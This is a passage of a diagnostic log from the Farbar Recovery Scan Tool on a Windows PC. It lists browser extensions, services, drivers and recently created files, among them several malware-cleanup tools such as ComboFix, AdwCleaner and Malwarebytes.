FF Extension: NoScript - C:\Users\McLain\AppData\Roaming\Mozilla\Firefox\Profiles\iaxa0uvq.default-1353978850101\Extensions\{73a6fe31-595d-460b-a920-fcc0f8843232}.xpi [2014-10-27]
FF Extension: Adblock Plus - C:\Users\McLain\AppData\Roaming\Mozilla\Firefox\Profiles\iaxa0uvq.default-1353978850101\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2014-10-27]
FF Extension: No Name - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2014-10-23]

Chrome:
=======
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR Profile: C:\Users\McLain\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\McLain\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-10-27]
CHR Extension: (Google Drive) - C:\Users\McLain\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-10-27]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\McLain\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-10-27]
CHR Extension: (YouTube) - C:\Users\McLain\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-10-27]
CHR Extension: (Google Search) - C:\Users\McLain\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-10-27]
CHR Extension: (Google Wallet) - C:\Users\McLain\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-10-27]
CHR Extension: (Gmail) - C:\Users\McLain\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-10-27]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe [431920 2014-09-24] (Avira Operations GmbH & Co. KG)
R2 AntiVirService; C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe [431920 2014-09-24] (Avira Operations GmbH & Co. KG)
R2 ASUSWireless; C:\Program Files (x86)\ASUS\PCE-N53 WLAN Card Utilities\Common\ASUSService.exe [184320 2012-03-21] () [File not signed]
R2 Avira.OE.ServiceHost; C:\Program Files (x86)\Avira\My Avira\Avira.OE.ServiceHost.exe [162096 2014-10-09] (Avira Operations GmbH & Co. KG)
R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1390176 2014-07-14] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1767520 2014-07-14] (Microsoft Corporation)
S4 jswpsapi; C:\Program Files (x86)\NETGEAR\WN111v2\jswpsapi.exe [942080 2008-02-29] (Atheros Communications, Inc.) [File not signed]
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2009-05-14] (Hewlett-Packard) [File not signed]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2009-05-14] (Hewlett-Packard) [File not signed]
S4 RalinkRegistryWriter; C:\Program Files (x86)\ASUS\PCE-N53 WLAN Card Utilities\Common\RaRegistry.exe [375872 2012-03-21] (Ralink Technology, Corp.)
S4 RealtekSE; C:\Program Files (x86)\ASUS\PCE-N10 WLAN Card Utilities\RtlService.exe [36864 2011-06-23] (Realtek) [File not signed]
S2 sftlist; "C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe" [X]
S3 sftvsa; "C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe" [X]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-13] (Microsoft Corporation)
R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [13440 2009-08-03] ()
R1 AsUpIO; C:\Windows\SysWow64\drivers\AsUpIO.sys [13368 2009-07-05] ()
R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [119272 2014-09-24] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\Windows\System32\DRIVERS\avipbb.sys [131608 2014-09-24] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\Windows\System32\DRIVERS\avkmgr.sys [28600 2014-09-24] (Avira Operations GmbH & Co. KG)
S2 DgiVecp; C:\Windows\system32\Drivers\DgiVecp.sys [53816 2009-02-10] (Samsung Electronics Co., Ltd.)
R0 gfibto; C:\Windows\System32\drivers\gfibto.sys [14456 2013-05-16] (GFI Software)
S3 Leapfrog-USBLAN; C:\Windows\System32\DRIVERS\btblan.sys [40320 2011-11-12] (Belcarra Technologies) [File not signed]
R3 MTsensor; C:\Windows\system32\DRIVERS\ASACPI.sys [15416 2009-07-15] ()
S3 PCAMp50a64; C:\Windows\System32\Drivers\PCAMp50a64.sys [43328 2006-11-28] (Printing Communications Assoc., Inc. (PCAUSA))
S3 PCASp50a64; C:\Windows\System32\Drivers\PCASp50a64.sys [41280 2006-11-28] (Printing Communications Assoc., Inc. (PCAUSA))
S3 Serial; C:\Windows\system32\DRIVERS\serial.sys [94208 2009-07-13] (Brother Industries Ltd.)
R2 SSPORT; C:\Windows\SysWOW64\Drivers\SSPORT.sys [11576 2009-02-06] (Samsung Electronics)
S3 WN111v2; C:\Windows\System32\DRIVERS\WN111v2w7x.sys [767488 2009-10-21] (Atheros Communications, Inc.)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
S3 lmimirr; system32\DRIVERS\lmimirr.sys [X]
S3 WinRing0_1_2_0; \??\C:\Program Files (x86)\IObit\Game Booster 3\Driver\WinRing0x64.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-27 16:38 - 2014-10-27 16:23 - 00024064 _____ () C:\Windows\zoek-delete.exe
2014-10-27 16:24 - 2014-10-27 17:42 - 00069122 _____ () C:\zoek-results.log
2014-10-27 16:23 - 2014-10-27 17:42 - 00000000 ____D () C:\zoek_backup
2014-10-27 16:22 - 2014-10-27 16:22 - 01290752 _____ () C:\Users\McLain\Desktop\zoek.exe
2014-10-27 14:56 - 2014-10-27 14:56 - 00001356 _____ () C:\Users\McLain\Desktop\AdwCleaner[s2].txt
2014-10-27 14:37 - 2014-10-27 14:37 - 00001097 _____ () C:\Users\McLain\Desktop\JRT.txt
2014-10-27 14:34 - 2014-10-27 14:34 - 01998336 _____ () C:\Users\McLain\Desktop\AdwCleaner.exe
2014-10-27 14:34 - 2014-10-27 14:34 - 01706144 _____ (Thisisu) C:\Users\McLain\Desktop\JRT.exe
2014-10-27 14:06 - 2014-10-27 14:06 - 00027168 _____ () C:\Users\McLain\Desktop\Addition.txt
2014-10-27 14:05 - 2014-10-28 01:52 - 00011969 _____ () C:\Users\McLain\Desktop\FRST.txt
2014-10-27 13:53 - 2014-10-27 17:42 - 00136278 _____ () C:\Windows\PFRO.log
2014-10-27 07:08 - 2014-10-27 07:08 - 00000000 ____D () C:\Users\McLain\AppData\Roaming\Avira
2014-10-27 07:08 - 2014-10-27 07:07 - 00043064 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avnetflt.sys
2014-10-27 07:06 - 2014-09-24 12:44 - 00131608 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avipbb.sys
2014-10-27 07:06 - 2014-09-24 12:44 - 00119272 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avgntflt.sys
2014-10-27 07:06 - 2014-09-24 12:44 - 00028600 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avkmgr.sys
2014-10-27 07:05 - 2014-10-27 07:07 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avira
2014-10-27 07:05 - 2014-10-27 07:06 - 00000000 ____D () C:\ProgramData\Avira
2014-10-27 07:05 - 2014-10-27 07:06 - 00000000 ____D () C:\Program Files (x86)\Avira
2014-10-27 07:05 - 2014-10-27 07:05 - 04585472 _____ (Avira Operations GmbH & Co. KG) C:\Users\McLain\Downloads\avira_en_av___ws.exe
2014-10-27 07:05 - 2014-10-27 07:05 - 00001137 _____ () C:\Users\Public\Desktop\Avira.lnk
2014-10-27 07:02 - 2014-10-27 07:02 - 00019472 _____ () C:\ComboFix.txt
2014-10-27 06:47 - 2014-10-27 06:47 - 05591695 ____R (Swearware) C:\Users\McLain\Downloads\ComboFix.exe
2014-10-27 02:04 - 2014-10-27 02:04 - 02113024 _____ (Farbar) C:\Users\McLain\Desktop\FRST64.exe
2014-10-27 02:04 - 2014-10-27 02:04 - 00001071 _____ () C:\Users\McLain\Desktop\Malwarebytes scan.txt
2014-10-27 01:50 - 2014-10-27 17:42 - 00000336 _____ () C:\Windows\setupact.log
2014-10-27 01:50 - 2014-10-27 01:50 - 00000000 _____ () C:\Windows\setuperr.log
2014-10-27 00:33 - 2014-10-28 01:51 - 00000000 ____D () C:\FRST
2014-10-26 22:39 - 2014-10-26 22:39 - 00000000 ____D () C:\ProgramData\CheckPoint
2014-10-25 10:22 - 2014-10-26 17:40 - 00000000 ____D () C:\Windows\Minidump
2014-10-25 01:53 - 2014-10-25 01:53 - 00000000 ____D () C:\ProgramData\Licenses
2014-10-25 01:47 - 2014-10-25 01:47 - 01700352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdiplus.dll
2014-10-25 01:47 - 2014-10-25 01:47 - 01060864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc71.dll
2014-10-25 01:45 - 2014-10-27 00:54 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Comodo
2014-10-25 01:45 - 2014-10-26 14:11 - 00000000 ____D () C:\Program Files\COMODO
2014-10-25 01:45 - 2014-10-25 01:47 - 00000000 ____D () C:\Program Files (x86)\Comodo
2014-10-25 01:42 - 2014-10-26 14:11 - 00000000 ____D () C:\ProgramData\Comodo
2014-10-25 00:24 - 2014-10-25 00:24 - 00000000 ____D () C:\Windows\ERUNT
2014-10-24 04:06 - 2014-09-18 18:18 - 00940032 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-10-24 03:48 - 2014-08-28 19:07 - 03179520 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorets.dll
2014-10-24 03:48 - 2014-05-08 02:32 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\RdpGroupPolicyExtension.dll
2014-10-24 03:42 - 2014-09-04 19:11 - 06584320 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2014-10-24 03:42 - 2014-09-04 18:52 - 05703168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2014-10-24 00:06 - 2013-10-01 19:22 - 00056832 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\TsUsbFlt.sys
2014-10-24 00:06 - 2013-10-01 19:11 - 00013824 _____ (Microsoft Corporation) C:\Windows\system32\TsUsbRedirectionGroupPolicyControl.exe
2014-10-24 00:06 - 2013-10-01 19:08 - 00012800 _____ (Microsoft Corporation) C:\Windows\system32\TsUsbRedirectionGroupPolicyExtension.dll
2014-10-24 00:06 - 2013-10-01 18:48 - 00056832 _____ (Microsoft Corporation) C:\Windows\system32\MsRdpWebAccess.dll
2014-10-24 00:06 - 2013-10-01 18:48 - 00018944 _____ (Microsoft Corporation) C:\Windows\system32\wksprtPS.dll
2014-10-24 00:06 - 2013-10-01 18:29 - 00062976 _____ (Microsoft Corporation) C:\Windows\system32\tsgqec.dll
2014-10-24 00:06 - 2013-10-01 18:10 - 00044544 _____ (Microsoft Corporation) C:\Windows\system32\TsUsbGDCoInstaller.dll
2014-10-24 00:06 - 2013-10-01 17:15 - 01057280 _____ (Microsoft Corporation) C:\Windows\system32\rdvidcrl.dll
2014-10-24 00:06 - 2013-10-01 17:14 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MsRdpWebAccess.dll
2014-10-24 00:06 - 2013-10-01 17:14 - 00017920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wksprtPS.dll
2014-10-24 00:06 - 2013-10-01 17:08 - 00083968 _____ (Microsoft Corporation) C:\Windows\system32\TSWbPrxy.exe
2014-10-24 00:06 - 2013-10-01 17:01 - 00420864 _____ (Microsoft Corporation) C:\Windows\system32\wksprt.exe
2014-10-24 00:06 - 2013-10-01 16:58 - 00053248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tsgqec.dll
2014-10-24 00:06 - 2013-10-01 16:31 - 01147392 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2014-10-24 00:06 - 2013-10-01 16:08 - 00855552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdvidcrl.dll
2014-10-24 00:06 - 2013-10-01 15:34 - 01068544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 23631360 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 17484800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 13619200 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 11807232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 05829632 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 04201472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 02796032 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-10-24 00:03 - 2014-10-24 00:03 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-24 00:03 - 2014-10-24 00:03 - 02309632 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 02187264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 02108416 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-24 00:03 - 2014-10-24 00:03 - 02017280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-10-24 00:03 - 2014-10-24 00:03 - 01810944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 01447936 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 01249280 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 01190400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 01068032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00942592 _____ (Microsoft Corporation) C:\Windows\system32\jsIntl.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00775168 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00774144 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00758272 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00731136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00710656 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 00678400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00645120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsIntl.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00616104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dat
2014-10-24 00:03 - 2014-10-24 00:03 - 00616104 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dat
2014-10-24 00:03 - 2014-10-24 00:03 - 00610304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00597504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00595968 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00547328 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00454656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00446464 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00440320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00413696 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2014-10-24 00:03 - 2014-10-24 00:03 - 00378552 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00365056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00337408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2014-10-24 00:03 - 2014-10-24 00:03 - 00331448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00289280 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00247808 _____ (Microsoft Corporation) C:\Windows\system32\msls31.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00243200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\url.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00235008 _____ (Microsoft Corporation) C:\Windows\system32\elshyph.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00233472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\url.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00208384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00194048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\elshyph.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00182272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msls31.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00167424 _____ (Microsoft Corporation) C:\Windows\system32\iexpress.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 00164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00151552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iexpress.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 00147968 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00143872 _____ (Microsoft Corporation) C:\Windows\system32\wextract.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 00139264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wextract.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 00139264 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 00135680 _____ (Microsoft Corporation) C:\Windows\system32\iepeers.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00131072 _____ (Microsoft Corporation) C:\Windows\system32\IEAdvpack.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00127488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00116736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iepeers.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00112128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 00111616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\IEAdvpack.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 00105984 _____ (Microsoft Corporation) C:\Windows\system32\iesysprep.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00101376 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00090112 _____ (Microsoft Corporation) C:\Windows\system32\SetIEInstalledDate.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 00086016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesysprep.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00086016 _____ (Microsoft Corporation) C:\Windows\system32\RegisterIEPKEYs.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 00085504 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00083968 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00083456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inseng.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00081408 _____ (Microsoft Corporation) C:\Windows\system32\icardie.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\tdc.ocx
2014-10-24 00:03 - 2014-10-24 00:03 - 00074240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SetIEInstalledDate.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 00072704 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00071680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\RegisterIEPKEYs.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 00069632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00069120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\icardie.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdc.ocx
2014-10-24 00:03 - 2014-10-24 00:03 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\pngfilt.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00056832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\pngfilt.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00052224 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00048640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmler.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\mshtmler.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00048128 _____ (Microsoft Corporation) C:\Windows\system32\imgutil.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedsbs.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\imgutil.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00030208 _____ (Microsoft Corporation) C:\Windows\system32\licmgr10.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00024576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\licmgr10.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00013824 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 00013312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshta.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 00012800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedssync.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-10-23 23:56 - 2012-08-23 07:13 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\rdpudd.dll
2014-10-23 23:56 - 2012-08-23 07:10 - 00019456 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpvideominiport.sys
2014-10-23 23:56 - 2012-08-23 04:12 - 00192000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdpendp_winip.dll
2014-10-23 23:56 - 2012-08-23 03:51 - 00228864 _____ (Microsoft Corporation) C:\Windows\system32\rdpendp_winip.dll
2014-10-23 23:55 - 2014-10-23 23:55 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2014-10-23 23:52 - 2014-10-23 23:52 - 00000000 ____D () C:\Program Files\Microsoft Silverlight
2014-10-23 23:52 - 2014-10-23 23:52 - 00000000 ____D () C:\Program Files (x86)\Microsoft Silverlight
2014-10-23 09:02 - 2014-10-23 09:02 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox
2014-10-20 22:25 - 2014-10-27 07:02 - 00000000 ____D () C:\Qoobox
2014-10-20 22:25 - 2014-10-21 00:13 - 00000000 ____D () C:\Windows\erdnt
2014-10-20 22:25 - 2011-06-25 23:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-10-20 22:25 - 2010-11-07 10:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-10-20 22:25 - 2009-04-19 21:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-10-20 22:25 - 2000-08-30 17:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-10-20 22:25 - 2000-08-30 17:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-10-20 22:25 - 2000-08-30 17:00 - 00098816 _____ () C:\Windows\sed.exe
2014-10-20 22:25 - 2000-08-30 17:00 - 00080412 _____ () C:\Windows\grep.exe
2014-10-20 22:25 - 2000-08-30 17:00 - 00068096 _____ () C:\Windows\zip.exe
2014-10-20 21:51 - 2014-10-27 14:54 - 00000000 ____D () C:\AdwCleaner
2014-10-19 13:52 - 2014-10-25 02:06 - 00000000 ____D () C:\Windows\pss
2014-10-19 12:12 - 2014-10-27 01:51 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-19 12:11 - 2014-10-20 21:28 - 00092888 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
